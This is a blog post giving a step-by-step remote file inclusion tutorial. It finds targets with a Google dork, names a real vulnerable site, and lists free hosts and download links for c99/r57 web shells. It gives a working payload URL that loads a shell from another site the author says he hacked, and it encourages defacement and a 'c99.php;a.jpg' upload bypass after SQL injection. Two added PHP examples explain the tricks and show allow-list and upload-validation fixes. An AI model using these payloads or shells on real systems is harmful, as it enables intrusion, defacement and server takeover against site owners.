Monday 16 July 2012

RFI Trick ... Website

A website is vulnerable to remote file inclusion (RFI) when a script takes a file name from user input and passes it to include() or a similar call, so that the server fetches and executes a file from whatever URL the user supplies. The most dangerous part is that an attacker who gets a web shell (.php/.asp) executed this way has command execution as the web-server account: on an MS IIS server that means access to the C:\ drive, on a Unix/Linux server access to the filesystem, and from there a foothold to try to root the box (the shell itself runs as the web-server user, not as root).

How do we find such sites? The answer is simple: Google helps us find them.

Example: find vulnerable pages using a Google dork.

Dork:

inurl:.php?page=

or you can easily find many more dorks on Google by simply searching for "RFI DORKS".

Now I have found this:

http://www.cbspk.com/v2/index.php?page=

Here I see that I can put

page=http://google.com/

Let me do it:

http://www.cbspk.com/v2/index.php?page=http://google.com/

Wow!!! Google opens inside this website's body, which means the page is vulnerable to RFI.
[Screenshot: RFI vulnerable]

Okay, now what do we have to do? We put page=http://google.com there and it worked. Now make an account on any free web hosting site. The following are free web hosting websites:
===========================================================================
* 110mb – http://110mb.com
* Ripway – http://ripway.com
* SuperFreeHost – http://superfreehost.info
* Freehostia – http://freehostia.com
* Funpic – http://funpic.de (How to remove ads?)
* Funpic – http://funpic.org (How to remove ads?)
* Freeweb7 – http://freeweb7.com
* t35 – http://t35.com
* Awardspace – http://awardspace.com
* PHPNet – http://phpnet.us
* Free Web Hosting Pro – http://freewebhostingpro.com
* ProHosts – http://prohosts.org
* AtSpace – http://atspace.com
* ByetHost – http://byethost.com/
* 000webhost – http://000webhost.com/
* My5GB – http://www.my5gb.com/
* Oxyhost – http://www.oxyhost.com/
* Rack111 – http://www.rack111.com/
* Ocostwebhost – http://0costwebhost.com/
* FreeZoka – http://www.freezoka.com/
===========================================================================
Upload your c99 or r57 or any other shell, matching the target: if it is a .php website upload a .php shell, if it is an .asp website upload an .asp shell. Download the most commonly used .asp and .php shells from here (public copies of c99 and r57 are often backdoored, so read the source before using one):
  • .asp shells
http://www.4shared.com/file/6-lnyvDk/allasp.html
  • .php shells
http://www.4shared.com/file/_41z5JGY/allphp.html
Get the link to the uploaded shell from the web hosting site and put that link into the vulnerable site's parameter, like:

http://www.cbspk.com/v2/index.php?page=http://www.seth.pt/portals/0/kp/kp1.txt?

I know you are wondering why I put

page=http://www.seth.pt/portals/0/kp/kp1.txt?

Don't worry, haha. I hacked www.seth.pt too, so I uploaded shells there instead of on a web hosting site and kept the links to them for further use.

NOTE: why the ? after kp1.txt?

Because the shell was uploaded as a .txt file and the vulnerable script appends its own suffix (typically .php) to the parameter before including it. The trailing ? turns that suffix into a query string, so the remote server still serves kp1.txt, and PHP executes whatever it fetched regardless of the extension. The shell is uploaded as .txt precisely so the hosting server sends the PHP source instead of running it itself.

Finally, when you open the link

http://www.cbspk.com/v2/index.php?page=http://www.seth.pt/portals/0/kp/kp1.txt?

you will get a screen like this:

[Screenshot: rfi-shell-uploaded]

It means we have successfully loaded the shell. Now use its features to deface the website or have fun.
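The walkthrough above never shows the code on the receiving end. The following is an added example, not code from the original post or from the targeted sites: it reconstructs the kind of index.php?page= handler that the dork finds, shows with parse_url() why the trailing ? keeps the remote shell reachable when the script appends .php, and puts the allow-list fix beside it. The page names, the directory layout and the attacker host attacker.example are assumptions.

```php
<?php
// Added example, not code from the original post. It reconstructs the kind of
// page the walkthrough targets (index.php?page=...) and its fix. The page
// names and the attacker host "attacker.example" are assumptions.

// --- Vulnerable pattern -----------------------------------------------------
// Remote inclusion only works when allow_url_include=On (off by default since
// PHP 5.2 and deprecated since 7.4), which is why old hosts were the usual
// victims. The appended ".php" is why the payloads end with "?": the suffix
// becomes a query string and the remote server still serves the raw shell.
function vulnerable_include(string $page): void {
    include $page . '.php';
}

// parse_url() shows what PHP's HTTP wrapper would actually request for a
// given payload, without making any network connection.
function effective_remote_target(string $page): array {
    $u = parse_url($page . '.php');
    return [
        'host'  => $u['host']  ?? '',
        'path'  => $u['path']  ?? '',
        'query' => $u['query'] ?? '',
    ];
}

// --- Hardened pattern -------------------------------------------------------
const ALLOWED_PAGES = ['home', 'about', 'contact'];

// Map the request parameter to a file only through an allow-list; anything
// else (URLs, "../", NUL bytes, php:// or data: wrappers) is rejected before
// include() ever sees it.
function resolve_page(string $page): ?string {
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }
    return __DIR__ . '/pages/' . $page . '.php';
}

function safe_include(string $page): void {
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(404);
        echo "Unknown page\n";
        return;
    }
    include $path;
}

// Demonstration with constructed payloads (nothing is fetched or included).
$payloads = [
    'about',
    'http://attacker.example/kp1.txt',
    'http://attacker.example/kp1.txt?',
    '../../../../etc/passwd%00',
];
foreach ($payloads as $p) {
    $t = effective_remote_target($p);
    printf("%-36s allow-listed=%-3s vulnerable script would request: %s%s%s\n",
        $p,
        resolve_page($p) === null ? 'no' : 'yes',
        $t['host'], $t['path'],
        $t['query'] !== '' ? '?' . $t['query'] : '');
}
// In the real handler the entry point would be: safe_include($_GET['page'] ?? 'home');
```

Run with the php CLI: the line for http://attacker.example/kp1.txt shows the request going to /kp1.txt.php (which does not exist on the attacker's host), while the payload ending in ? shows /kp1.txt with a query string of .php, so the shell source is served and then executed by the vulnerable include. The allow-list column is "yes" only for about; the fix does not try to recognise bad input, it only ever includes files it already knows.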
=====================================================
Now I think you have the basic idea of shell uploading. We can also upload shells to websites that are vulnerable to SQLi: hack in via SQLi, get the web admin's credentials, then find a place where we can upload an image file or a txt file. Then rename our shell, for example:

Example:
from c99.php to c99.php;a.jpg

and upload it to the website as an image file to fool the server: an upload filter that only looks at the final extension sees .jpg, while a server that cuts the file name at the ";" (old IIS 6 did this) executes it as a script. When you get its link on the website, just open it and you have shell access; now you can try to root that site.
I will give more live examples of each topic at the end.
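The rename trick works against upload code that only inspects the text after the last dot. This added example, not code from the original post, shows that naive check beside a hardened one and runs both over constructed file names; the function names, the regex and the image types are assumptions made for the example.

```php
<?php
// Added example, not code from the original post. It shows why the
// "c99.php;a.jpg" rename defeats a naive extension check and how an upload
// handler should validate instead. The file names below are constructed test
// data; no real upload is performed.

const IMAGE_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif'];

// Naive filter: looks only at the text after the last dot. "c99.php;a.jpg"
// yields "jpg", so the shell is accepted; a server that cuts the name at ";"
// (old IIS 6 behaviour) then runs it as a script.
function naive_upload_allowed(string $clientName): bool {
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return in_array($ext, IMAGE_EXTENSIONS, true);
}

// Strict name check: the whole client-supplied name must match one pattern,
// which rules out ";", NUL bytes, path separators and double extensions.
// "\z" instead of "$" so a trailing newline cannot sneak past the check.
function valid_image_name(string $clientName): bool {
    return (bool) preg_match('/^[A-Za-z0-9_-]{1,64}\.(jpe?g|png|gif)\z/i', $clientName);
}

// Hardened filter: strict name, and the bytes must actually parse as an image.
// getimagesize() returns false for anything that is not a real image.
function hardened_upload_allowed(string $clientName, string $tmpPath): bool {
    if (!valid_image_name($clientName)) {
        return false;
    }
    $info = @getimagesize($tmpPath);
    if ($info === false) {
        return false;
    }
    return in_array($info['mime'], ['image/jpeg', 'image/png', 'image/gif'], true);
}

// Never keep the client's name on disk: generate one, keep only the checked
// extension, and store it under a directory where script execution is off.
function stored_name(string $clientName): string {
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Demonstration over constructed names (the content check needs a real temp
// file, so only the two name checks are exercised here).
$samples = ['photo.jpg', 'c99.php;a.jpg', 'c99.php', 'shell.php.jpg', "c99.php\0.jpg", "photo.jpg\n"];
foreach ($samples as $name) {
    printf("%-18s naive=%-6s strict=%s\n",
        addcslashes($name, "\0\n"),
        naive_upload_allowed($name) ? 'accept' : 'reject',
        valid_image_name($name) ? 'accept' : 'reject');
}
```

Run with the php CLI: the naive check accepts c99.php;a.jpg, shell.php.jpg and the NUL-byte variant because pathinfo() reports jpg for all of them, while the strict check accepts only photo.jpg. The name check alone is not enough on a real server; the upload directory also needs script execution disabled (for example a handler-less location in the web server config), and the stored file should get a server-generated name so the client's string never reaches the filesystem.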
=====================================================


Source

1 comment:

Anonymous said...

Copied from a great hacker, crazy3xploit's blog.


@jablayInside. Powered by Blogger.